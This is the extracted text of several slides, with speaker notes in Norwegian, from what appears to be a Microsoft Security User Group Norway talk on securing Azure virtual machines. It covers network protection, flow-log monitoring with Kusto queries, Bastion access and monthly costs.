  • 26. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Network and traffic flow • DDoS Protection • Protected OSI Layer 3&4 • Currently expensive • Protects everything with its own public IP • Out of order packets are dropped at edge • Azure Firewall • Layer 4 Statefull firewall • IPS/IDS and TLS inspection for east/west traffic • Threat intelligence • Support IP Groups • NSG Regler • NIC / Subnet • Service Tags (Five-tuple) Nettverk Access Rules: Allow Virtuell Maskin Network Security Group Subnet/NIC Data Collector Interface Log Analytics NetworkSecurityGroupEvent FlowLogs SecurityEvents VMConnection DeviceEvents DeviceFileEvents DeviceNetworkEvents DeviceProcessEvents Update ProtectionSTatus ServiceMap AzureFirewallApplicationRule AzureFirewallNetworkRule AzureFirewallThreatIntelLog AzureFirewallDnsProxy Azure Sentinel Security Custom Routes IPSEC Parameters Security Network Rules Application Rules Threat Intelligence filtering IP Groups IPS/IDS TLS Inspection Security SSL Policy (Detection/Block) HTTP Rewrite Bot Protection Geo Match Request size limit File Exclustion list WAF OWASP SQL Injection Cross-site script HTTP Request Smugling HTTP Protocol Violation Security IP Restrictions ServiceTags Application Security Groups Azure Firewall Azure Application Gateway Network Security Group
  • 27. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Azure NSG Flow Logs Traffic Analysis Network Security Group Azure Log Analytics Storage Account Microsoft Threat Intelligence Data berikelse Flow Logs: FlowDirection SrcIP DestIP NSGList NSGRule DeniedFlow AllowedFlow FlowCount AzureNetworkAnalytics_CL: FlowDirection FlowType L4Protocol L7Protocol NSGRule DeniedFlow AllowedFlow FlowCount NIC VM Subnet Country Region Hver time eller 10 minutt • Provides Insight into all network traffic going trough an NSG • Data enriched by Microsoft • Is traffic from a «bad» address? • Is traffic from another Azure service? • Is traffic from a known location? • Data will be availble in Log Analytics • And other fancy dashboards • Can also use 3.party as Cisco Stealthwatch • Example: AzureNetworkAnalytics_CL | where SubType_s == 'FlowLog’ and FlowType_s == 'MaliciousFlow'
  • 28. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Who did changes to the VM?! • Resource Locks • If you are using IaC you need to mace some adjustments to ensure locks are removed before modification • Change Analysis • Gir innsikt i endringer på Azure ressurser • Provices access into changes in Azure changes • Instead of trying to understanding all the JSON logic • Activity Log • Should still be routed to Log Analytics for longtime retention Kusto Query AzureActivity | where CategoryValue == "Administrative" | where ResourceGroup contains "noenoe-rg"
  • 29. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Access to the virtual machines? • Offentlig IP? • NAT IP? • JIT (Just-in-time access) ? • Azure Bastion • Support for native client with standard SKU • CLI  az network bastion rdp • Requires Reader Role on VMen • Fun fact: Based upon Apache Guacamole • Teleport or Cloudflare Access • Supports other protocols (TCP/UDP) • Supports integration with Azure AD
  • 30. ©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN @MsSecUGNorway Cool, so what does it cost? Example: (per month) 1 VM (4vCPU, 16GB) = 2800,- • + Storage, network Azure Backup (250 GB, 30 dager) = 193,- Azure Defender for 1 server = 120,- Azure Sentinel (~1-3 GB a month) = 51,- Azure DDoS (100 IPer) = 25500,- Azure AD for PIM P2 = 77,- Azure Traffic Analysis 1GB) = 30,- Guest Configuration Azure Policy = 52,- Azure Bastion Standard SKU = 1834,- Azure Automation (Free for 5 nodes) Totalt = 27857,- (+ 2800) for the one machine) But! Some big adjustments happening here soon

Editor's Notes

  1. * Flere sårbarheter en før * Legge til felles kjøreregler på grunnmuren i plattformen Definere at tjenester må ha etablert overvåkning, backup, bak definerte sikkerhetsmekanismer som er etablert Tilgang til tjenesten bade fra sluttbruker og utvikler er basert på kontekst Benytte kontinuerlig oppdaterte platform tjenester Ha tjenester som kan kontinuerlig se etter sårbarheter I applikasjonene eller tjenesten Overvåkning av tjenester Viktigste element som skyplatform gir er jo automatisering som kan benyttes for å etablere alle disse mekaniseme samt også bygging av applikasjonen. Med disse mekanismene I bunn har man et godt grunnlag for fremtidige tjenester som blir etablert på en skyplattform.